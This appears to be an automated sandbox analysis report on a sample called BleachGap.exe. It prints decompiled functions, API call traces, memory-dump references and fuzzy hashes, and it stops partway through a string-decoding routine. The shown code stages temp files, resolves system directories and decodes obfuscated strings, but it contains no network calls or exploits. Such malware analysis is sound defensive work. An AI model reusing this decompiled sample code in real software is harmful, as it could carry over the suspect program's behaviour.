Uniqueness Score: -1.00%

Analysis Process: BleachGap.exe PID: 3492 Parent PID: 3388 BleachGap.exeCOMMON

Executed Functions

Function 004098D0, Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E004098D0(_Unknown_base(*)()* _a4) {
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;

				 *0x4170e8 = _a4;
				_a4 = E00409890;
				_t6 = _a4;
				if(_t6 == 0) {
					_t7 = SetUnhandledExceptionFilter( *0x4170f0);
					 *0x4170f0 = 0;
					return _t7;
				} else {
					if( *0x4170f0 != 0) {
						_a4 = _t6;
						return SetUnhandledExceptionFilter(??);
					}
					_t8 = SetUnhandledExceptionFilter(_t6); // executed
					 *0x4170f0 = _t8;
					return _t8;
				}
			}

0x004098d4
0x004098d9
0x004099f0
0x004099f6
0x00409a20
0x00409a26
0x00409a30
0x004099f8
0x004099ff
0x00409a01
0x00409a05
0x00409a05
0x00409a0c
0x00409a12
0x00409a17
0x00409a17

APIs

SetUnhandledExceptionFilter.KERNELBASE(00409890,0040116F,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C,00000008), ref: 00409A0C
SetUnhandledExceptionFilter.KERNEL32(0040116F,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C,00000008,00000008), ref: 00409A20

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8b0f608e405cae46fc8e63b589dbaca7258740b989b39933334343d4a09fb59f
Instruction ID: 2c8fa190a6d032f87ec30cf03d38c93985f91324802676e59826f832aed0a575
Opcode Fuzzy Hash: 8b0f608e405cae46fc8e63b589dbaca7258740b989b39933334343d4a09fb59f
Instruction Fuzzy Hash: 38E0E5B0208341EFC710CF18E948B867BF5B788701F01C43AE445922A5E7348C44EF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040195B, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040195B(char __edx) {
				intOrPtr _v12;
				char _v16;
				signed int _v24;
				WCHAR* _v28;
				intOrPtr _v32;
				char _v40;
				WCHAR* _v52;
				WCHAR* _v76;
				WCHAR* _v100;
				intOrPtr _v116;
				void* _t28;
				void* _t29;
				void* _t35;
				void* _t36;
				void* _t44;
				void* _t45;
				void* _t54;
				void* _t55;
				void* _t63;
				void* _t68;
				char* _t72;
				void* _t74;
				void* _t75;
				void* _t79;
				char _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t97;
				void* _t100;
				intOrPtr* _t101;

				_t86 = __edx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E0040DF60();
				 *0x41702c = 0x416107;
				_v28 = 0;
				while(1) {
					_t103 = 3 - _v28;
					if(3 < _v28) {
						break;
					}
					_t72 =  *0x41702c; // 0x41609a
					_v24 =  *_t72;
					 *0x41702c =  *0x41702c + 1;
					_t74 = E0040DE20();
					_t97 = _t86;
					_push(_t74);
					_push(_t97);
					_t75 = E0040DE20();
					E00405D60(_t103, _v24 * 0xffffffff);
					E0040DE60( &_v28, _t75);
					_push(_v32);
					_t79 = E0040DE20();
					_pop(_t100);
					E0040DFC0(_t100);
					_t86 = _v40;
					E0040DFC0(_t86);
					E0040DE60( &_v40, _t79);
					 *_t101 =  *_t101 + 1;
					_t104 =  *_t101;
					if( *_t101 >= 0) {
						continue;
					}
					break;
				}
				_v16 = E00409B40(0x400);
				_t28 = E0040DE20();
				_t87 = _t86;
				_push(_t28);
				_t29 = E0040DE20();
				_t88 = _t87;
				E0040A6F6(_t104, _t29);
				_push( &_v16);
				E0040DE60();
				GetTempFileNameW(_v24, 0x416020, 0, _v28); // executed
				_t35 = E0040DE20();
				_t89 = _t88;
				_push(_t35);
				_t36 = E0040DE20();
				_t90 = _t89;
				E00409B60(_v28, _t36);
				_push(0x417070);
				E0040DE60();
				E0040A787( *0x417070);
				E0040A665( *0x417070); // executed
				GetTempFileNameW( *0x417070, 0x416020, 0, _v52); // executed
				_t44 = E0040DE20();
				_t91 = _t90;
				_push(_t44);
				_t45 = E0040DE20();
				_t92 = _t91;
				E00409B60(_v52, _t45);
				_push(0x417024);
				E0040DE60();
				E0040A787( *0x417024);
				E0040A665( *0x417024); // executed
				GetTempFileNameW( *0x417024, 0x416020, 0, _v76); // executed
				PathAddBackslashW( *0x417024);
				_t54 = E0040DE20();
				_t93 = _t92;
				_push(_t54);
				_t55 = E0040DE20();
				_t94 = _t93;
				E00409B60(_v76, _t55);
				_push(0x417038);
				E0040DE60();
				E0040A787( *0x417038);
				PathRenameExtensionW( *0x417038, _v100);
				GetTempFileNameW( *0x417024, 0x416020, 0, _v100); // executed
				_t63 = E0040DE20();
				_t95 = _t94;
				_push(_t63);
				E00409B60(_v100, E0040DE20());
				E0040DE60(0x417068, _t95);
				_t68 = E00409B20(_v116);
				return E0040DEF0(E0040DEF0(E0040DEF0(_t68, _v12), _v28), _v28);
			}

APIs

Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000001B,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C), ref: 0040DF77

GetTempFileNameW.KERNEL32(?,00416020,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004043B9), ref: 00401A2A
GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,?,00000000,00000000,?,00416020,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A7F
GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,?,00000000,00000000,00416020,00000000,00000000,00000000,?,00000000,00000000,?,00416020), ref: 00401AD4
PathAddBackslashW.SHLWAPI(00416020,00000000,00000000,00000000,?,00000000,00000000,00416020,00000000,00000000,00000000,?,00000000,00000000,?,00416020), ref: 00401ADF
PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00416020,00000000,00000000,00000000,?,00000000,00000000,00416020,00000000,00000000,00000000), ref: 00401B1E
GetTempFileNameW.KERNEL32(00416020,00000000,00000000,?,00000000,?,00000000,00000000,00416020,00000000,00000000,00000000,?,00000000,00000000,00416020), ref: 00401B38

Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B

Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02760000,00000000,?), ref: 0040DE99

Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7

Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(02760000,00000000,?,?), ref: 0040DEBC

Strings

`A, xrefs: 00401B2C
`A, xrefs: 00401A73
`A, xrefs: 00401A20
`A, xrefs: 00401AC8

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
String ID: `A$ `A$ `A$ `A
API String ID: 368575804-2594752929
Opcode ID: 1ba5b1041860197bcb70b5f8865f6e3a244e24124e7517cd294dd1039848c71c
Instruction ID: da94853b8b5bd26d1bd5120d1b9c906e5f4cf8f619d60ffb6644f8987c096960
Opcode Fuzzy Hash: 1ba5b1041860197bcb70b5f8865f6e3a244e24124e7517cd294dd1039848c71c
Instruction Fuzzy Hash: 6651EEB59047006ED601BBB2DD42E7F7B7EEB98318F00883FB540690E2C63D9C559A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104
memoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			_entry_(void* __ecx, void* __edx, void* __eflags) {
				void _t3;
				void* _t6;
				void* _t13;
				void* _t36;
				intOrPtr _t50;
				void* _t51;
				void* _t54;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t63;

				_t63 = __eflags;
				_t54 = __edx;
				_t51 = __ecx;
				memset(0x417008, 0, 0xac);
				 *0x41700c = GetModuleHandleW(0);
				_t3 = HeapCreate(0, 0x1000, 0); // executed
				 *0x417008 = _t3;
				E00405000(_t54);
				 *0x41702c = 0x416084; // executed
				_t6 = E0040DDD0(); // executed
				E0040DB41(_t6);
				E00409D61(E0040A2C9(E0040AA40()));
				E00409AE0();
				E00409609(); // executed
				_t13 = E00408D8E(_t51); // executed
				E004053BB(_t13);
				E0040C6E3(_t63);
				E0040B190(_t63);
				E00405068(0x417014, 0x41602a);
				 *0x417034 = GetStdHandle(0xfffffff5);
				_push(0x200);
				_push(0x4170b0);
				E00409D80(4, 0x15, 0);
				E0040A37A( *0x417098);
				E0040A2E8(8, 0x417098, 0x416074, 7);
				E0040A37A( *0x4170a0);
				E0040A2E8(4, 0x4170a0, 0x41606c, 8);
				_push(0x417090);
				_push(0x41607c);
				E0040DB6A(0xc, 0x186a1, 7);
				E00405068(0x417064, 0x416036);
				E0040A37A( *0x4170a8);
				E0040A2E8(4, 0x4170a8, 0x41606c, 8);
				E004098D0(E00401F3B);
				_t36 = E0040DE20();
				_t57 = 0x416036;
				E00402F41(0x417064, _t57, _t63, _t36);
				_push(0x417040);
				E0040DE60();
				E00401B8F(0x417064, _t57, _t63);
				_t50 =  *0x417050; // 0x0
				_t64 = _t50 - 1;
				if(_t50 == 1) {
					E00403001(0x417064, _t57, _t58, _t59, _t64);
				}
				E00403DF3(0x417064, _t58, _t59, _t60);
				_push(0);
				ExitProcess(); // executed
				E0040DE00(); // executed
				HeapDestroy( *0x417008); // executed
				ExitProcess(??); // executed
				E00405379();
				E004098F0();
				E0040A655();
				E0040D264(E0040AA30());
				return E00409AD0();
			}

APIs

memset.MSVCRT ref: 0040100F
GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035

Part of subcall function 0040DDD0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DDDC
Part of subcall function 0040DDD0: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DDE7

Part of subcall function 00409AE0: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409AE9

Part of subcall function 00409609: InitializeCriticalSection.KERNEL32(004176C8,00000004,00000004,004095DC,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409631

Part of subcall function 00408D8E: memset.MSVCRT ref: 00408D9B
Part of subcall function 00408D8E: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408DB5
Part of subcall function 00408D8E: CoInitialize.OLE32(00000000), ref: 00408DBD

Part of subcall function 004053BB: InitializeCriticalSection.KERNEL32(004176A0,0040107B,00000000,00001000,00000000,00000000), ref: 004053C0

GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A

Part of subcall function 00409D80: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409D9F
Part of subcall function 00409D80: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DC5
Part of subcall function 00409D80: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E22

Part of subcall function 0040A37A: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040A3B8
Part of subcall function 0040A37A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A3D1
Part of subcall function 0040A37A: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A3DB

Part of subcall function 0040A2E8: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,00416074,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A2FB
Part of subcall function 0040A2E8: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,00416074,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A310

Part of subcall function 0040DB6A: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C), ref: 0040DB9A
Part of subcall function 0040DB6A: memset.MSVCRT ref: 0040DBD5

Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B

Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02760000,00000000,?), ref: 0040DE99

Part of subcall function 00401B8F: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00417040,00000000), ref: 00401BCD
Part of subcall function 00401B8F: EnumResourceTypesW.KERNEL32 ref: 00401BEA
Part of subcall function 00401B8F: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401BF2

ExitProcess.KERNEL32(00000000,00417040,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C), ref: 004011A5
HeapDestroy.KERNEL32(00000000,00417040,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C), ref: 004011B5
ExitProcess.KERNEL32(00000000,00417040,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C), ref: 004011BA

Strings

*`A, xrefs: 00401085
6`A, xrefs: 0040112D

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Alloc$Free$CreateInitializememset$AllocateCriticalErrorExitHandleLastLibraryProcessSectionValue$CommonControlsDestroyEnumInitLoadModuleResourceTypes
String ID: *`A$6`A
API String ID: 3272620648-4032199909
Opcode ID: 1abe17b022b02830fc4d873b52a8b8611f819b2189e3f8509569470ef6cc0a1a
Instruction ID: 054f58a703c2077171097cea621e0c228d2d39f1c558e4fc4fd495567313132e
Opcode Fuzzy Hash: 1abe17b022b02830fc4d873b52a8b8611f819b2189e3f8509569470ef6cc0a1a
Instruction Fuzzy Hash: 33311C30A84700A9E610B7F29C43FAE3A65AF1874DF11803FB649791E3DEBD55448A6F

Uniqueness

Uniqueness Score: -1.00%

Function 00403275, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00403275(void* __edi, void* __ebp, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				WCHAR* _v16;
				char _v24;
				WCHAR* _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _t43;
				void* _t45;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t56;
				void* _t62;
				void* _t69;
				void* _t75;
				void* _t80;
				void* _t90;
				void* _t106;
				intOrPtr _t108;
				void* _t109;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t117;
				void* _t120;
				void* _t123;
				intOrPtr _t125;
				void* _t126;
				void* _t128;
				void* _t129;
				void* _t130;

				_t129 = __ebp;
				_t128 = __edi;
				_t106 = 7;
				do {
					_t130 = _t130 - 4;
					_v8 = 0;
					_t106 = _t106 - 1;
				} while (_t106 != 0);
				E004051A0(E0040DF60(), _a36);
				E00405060(_t130, _a24);
				_t108 = _a28;
				E00405060( &_v8, _t108);
				if(E00402BC1() == 0 || E0040559A() == 0x41) {
					_t43 = 0;
				} else {
					_t43 = 1;
				}
				if(_t43 == 0) {
					_t45 = E0040DE20();
					_t109 = _t108;
					_push(_t45);
					E00406260(_t128, 0x800, E0040DE20());
					E0040DE60( &_v8, _t109);
					GetSystemDirectoryW(_v16, 0x800);
					PathAddBackslashW(_v16);
				} else {
					_t62 = E0040DE20();
					_t114 = _t108;
					_push(_t62);
					E00406260(_t128, 0x800, E0040DE20());
					E0040DE60( &_v8, _t114); // executed
					GetWindowsDirectoryW(_v16, 0x800);
					PathAddBackslashW(_v16);
					_push(_v16);
					_t69 = E0040DE20();
					_pop(_t117);
					E0040DFC0(_t117);
					E0040DFC0(L"sysnative");
					E0040DE60( &_v24, _t69);
					PathAddBackslashW(_v32);
					_push(_v32);
					_t75 = E0040DE20();
					_pop(_t120);
					E0040DFC0(_t120);
					E0040DFC0(_v44);
					E0040DE60( &_v36, _t75);
					_push(_v48);
					_t80 = E0040DE20();
					_pop(_t123);
					E0040DFC0(_t123);
					E0040DFC0(_v60);
					_t125 = _v60;
					E0040DFC0(_t125);
					E0040DE60( &_v52, _t80);
					if(E0040AD60(_t129, 0, _v64) == 0) {
						_a12 = 0;
					} else {
						_a12 = 1;
						E0040A970(0);
					}
					if(E0040AD60(_t129, 0, _a8) == 0) {
						_a16 = 0;
					} else {
						_a16 = 1;
						E0040A970(0);
					}
					if(_a12 + _a16 == 0) {
						_t90 = E0040DE20();
						_t126 = _t125;
						_push(_t90);
						E00406260(_t128, 0x800, E0040DE20());
						E0040DE60( &_v8, _t126);
						GetSystemDirectoryW(_v16, 0x800);
						PathAddBackslashW(_v16);
					}
				}
				_push(_v0);
				_t52 = E0040DE20();
				_pop(_t112);
				E0040DFC0(_t112);
				_t54 = _t52;
				_t55 = E00405170();
				_t113 = _t54;
				_t56 = _t55 + _t113;
				return E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(_t56, _a8), _v12), _v12), _v12), _v12);
			}

APIs

GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403302
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040330B
GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 0040342B
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00403434

Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(02760000,00000000,?,?), ref: 0040DEBC

PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040333B

Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B

Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02760000,00000000,?), ref: 0040DE99

GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403468
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403471

Strings

sysnative, xrefs: 00403322, 00403327

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
String ID: sysnative
API String ID: 3406704365-821172135
Opcode ID: b20c9ae3932b8e0ef357907c6ae28b98a0e625ce9d02519da34cd8c021745bfe
Instruction ID: 120ea7a7f831b7b3701c46aacaf1f8b25255709322070768e577057f0a501d54
Opcode Fuzzy Hash: b20c9ae3932b8e0ef357907c6ae28b98a0e625ce9d02519da34cd8c021745bfe
Instruction Fuzzy Hash: 39512075518701AAD600BBB1CD82F2F66A9EFD0708F10C83FB144791D2CA3CD9595BAE

Uniqueness

Uniqueness Score: -1.00%

Function 00403DF3, Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 640
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00403DF3(void* __ecx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, void* _a20, intOrPtr _a28, void* _a44) {
				char _v0;
				signed int _v4;
				WCHAR* _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _v28;
				void* _v32;
				void* _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v84;
				intOrPtr _v100;
				intOrPtr _v108;
				char _v120;
				char _v128;
				WCHAR* _v136;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				WCHAR* _v160;
				void* __ebx;
				void* _t114;
				void* _t119;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void* _t144;
				void* _t149;
				void* _t150;
				void* _t151;
				void* _t157;
				void* _t158;
				void* _t164;
				void* _t169;
				void* _t174;
				void* _t178;
				void* _t186;
				void* _t191;
				void* _t195;
				void* _t198;
				void* _t199;
				char* _t218;
				void* _t220;
				void* _t221;
				void* _t225;
				char* _t230;
				void* _t232;
				void* _t233;
				void* _t237;
				char* _t242;
				void* _t244;
				void* _t245;
				void* _t249;
				char* _t254;
				void* _t256;
				void* _t257;
				void* _t261;
				char* _t266;
				void* _t268;
				void* _t269;
				void* _t273;
				char* _t278;
				void* _t280;
				void* _t281;
				void* _t285;
				char* _t290;
				void* _t292;
				void* _t293;
				void* _t297;
				char* _t302;
				void* _t304;
				void* _t305;
				void* _t309;
				char* _t314;
				void* _t316;
				void* _t317;
				void* _t321;
				intOrPtr _t328;
				void* _t347;
				char _t348;
				intOrPtr _t349;
				void* _t350;
				intOrPtr _t351;
				void* _t352;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t356;
				void* _t357;
				void* _t358;
				void* _t359;
				void* _t360;
				char _t361;
				void* _t362;
				void* _t363;
				void* _t364;
				intOrPtr _t365;
				void* _t366;
				intOrPtr _t367;
				void* _t368;
				intOrPtr _t369;
				void* _t370;
				void* _t372;
				intOrPtr _t374;
				void* _t377;
				intOrPtr _t379;
				void* _t380;
				void* _t383;
				intOrPtr _t384;
				void* _t385;
				intOrPtr _t387;
				void* _t388;
				void* _t389;
				intOrPtr _t391;
				void* _t392;
				void* _t393;
				intOrPtr _t395;
				void* _t396;
				void* _t397;
				intOrPtr _t399;
				void* _t400;
				void* _t401;
				void* _t404;
				void* _t405;
				void* _t408;
				void* _t409;
				void* _t412;
				void* _t413;
				void* _t416;
				void* _t417;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				intOrPtr* _t424;

				_t423 = __ebp;
				_t422 = __esi;
				_t421 = __edi;
				_t347 = __ecx;
				_t348 = 0xf;
				do {
					_t424 = _t424 - 4;
					_v8 = 0;
					_t348 = _t348 - 1;
				} while (_t348 != 0);
				E0040DF60();
				 *0x41702c = 0x41609a;
				_v8 = 0;
				while(1) {
					_t427 = 0x19 - _v8;
					if(0x19 < _v8) {
						break;
					}
					_t314 =  *0x41702c; // 0x41609a
					_v4 =  *_t314;
					 *0x41702c =  *0x41702c + 1;
					_t316 = E0040DE20();
					_t417 = _t348;
					_push(_t316);
					_push(_t417);
					_t317 = E0040DE20();
					E00405D60(_t427, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t317);
					_push(_v12);
					_t321 = E0040DE20();
					_pop(_t420);
					E0040DFC0(_t420);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60( &_v20, _t321);
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x4160fe;
				_v8 = 0;
				while(1) {
					_t429 = 2 - _v8;
					if(2 < _v8) {
						break;
					}
					_t302 =  *0x41702c; // 0x41609a
					_v4 =  *_t302;
					 *0x41702c =  *0x41702c + 1;
					_t304 = E0040DE20();
					_t413 = _t348;
					_push(_t304);
					_push(_t413);
					_t305 = E0040DE20();
					E00405D60(_t429, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t305);
					_push(_v8);
					_t309 = E0040DE20();
					_pop(_t416);
					E0040DFC0(_t416);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60( &_v16, _t309);
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x416103;
				_v8 = 0;
				while(1) {
					_t431 = 3 - _v8;
					if(3 < _v8) {
						break;
					}
					_t290 =  *0x41702c; // 0x41609a
					_v4 =  *_t290;
					 *0x41702c =  *0x41702c + 1;
					_t292 = E0040DE20();
					_t409 = _t348;
					_push(_t292);
					_push(_t409);
					_t293 = E0040DE20();
					E00405D60(_t431, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t293);
					_push(_v4);
					_t297 = E0040DE20();
					_pop(_t412);
					E0040DFC0(_t412);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60( &_v12, _t297);
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x416101;
				_v8 = 0;
				while(1) {
					_t433 = 1 - _v8;
					if(1 < _v8) {
						break;
					}
					_t278 =  *0x41702c; // 0x41609a
					_v4 =  *_t278;
					 *0x41702c =  *0x41702c + 1;
					_t280 = E0040DE20();
					_t405 = _t348;
					_push(_t280);
					_push(_t405);
					_t281 = E0040DE20();
					E00405D60(_t433, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t281);
					_push(_v0);
					_t285 = E0040DE20();
					_pop(_t408);
					E0040DFC0(_t408);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60( &_v8, _t285);
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x4160d7;
				_v8 = 0;
				while(1) {
					_t435 = 0xd - _v8;
					if(0xd < _v8) {
						break;
					}
					_t266 =  *0x41702c; // 0x41609a
					_v4 =  *_t266;
					 *0x41702c =  *0x41702c + 1;
					_t268 = E0040DE20();
					_t401 = _t348;
					_push(_t268);
					_push(_t401);
					_t269 = E0040DE20();
					E00405D60(_t435, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t269);
					_push(_a4);
					_t273 = E0040DE20();
					_pop(_t404);
					E0040DFC0(_t404);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60( &_v4, _t273); // executed
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x4160e5;
				_v8 = 0;
				while(1) {
					_t437 = 0xe - _v8;
					if(0xe < _v8) {
						break;
					}
					_t254 =  *0x41702c; // 0x41609a
					_v4 =  *_t254;
					 *0x41702c =  *0x41702c + 1;
					_t256 = E0040DE20();
					_t397 = _t348;
					_push(_t256);
					_push(_t397);
					_t257 = E0040DE20();
					E00405D60(_t437, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t257);
					_t399 =  *0x417030; // 0x27604d0
					_t261 = E0040DE20();
